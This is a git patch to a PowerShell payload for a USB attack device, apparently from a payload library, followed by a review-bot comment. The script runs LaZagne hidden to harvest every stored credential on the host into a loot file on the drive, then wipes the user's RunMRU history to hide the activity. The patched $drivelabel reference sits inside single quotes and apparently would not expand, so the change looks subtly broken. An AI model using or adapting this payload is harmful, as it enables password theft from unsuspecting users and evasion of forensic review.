From f7cf46fd952601f4a5ecfe9cd72510439bb4b89a Mon Sep 17 00:00:00 2001
From: Rafa Guillermo
Date: Mon, 30 Sep 2024 20:21:11 +0200
Subject: [PATCH] Update payload.ps1 added missed $drivelabel reference
---
.../library/credentials/NoDefenseAgainstLaZagne/payload.ps1 | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1 b/payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1
index c91c6925..92b57df4 100644
--- a/payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1
+++ b/payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1
@@ -2,5 +2,5 @@ $drivelabel = 'BashBunny'
 $dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
 $filter = 'password_'+ $env:COMPUTERNAME
 $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
-Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
\ No newline at end of file
+Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
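Review bot: The re-added `Remove-ItemProperty` line deletes every value under the current user's RunMRU key (`-Name '*'`) with `-ErrorAction SilentlyContinue`, and neither added line carries a comment stating what it does or what side effects it has on the host. I would document both, e.g. `# Starts tooling\LaZagne.exe with a hidden window; stdout is redirected to a numbered file under $dest` above `Start-Process` and `# Removes ALL Run-dialog history values for the current user; errors are suppressed` above `Remove-ItemProperty`. From a detection standpoint the visible behaviour is a hidden-window process launched from a path resolved by volume label and a wholesale clearing of the RunMRU key, both of which show up in process-creation and registry auditing; stating that in the header comment would make the artifacts easier to find in an assessment report. The `$drivelabel` assignment itself is only visible in the hunk header, on line 1 of the file outside the hunk.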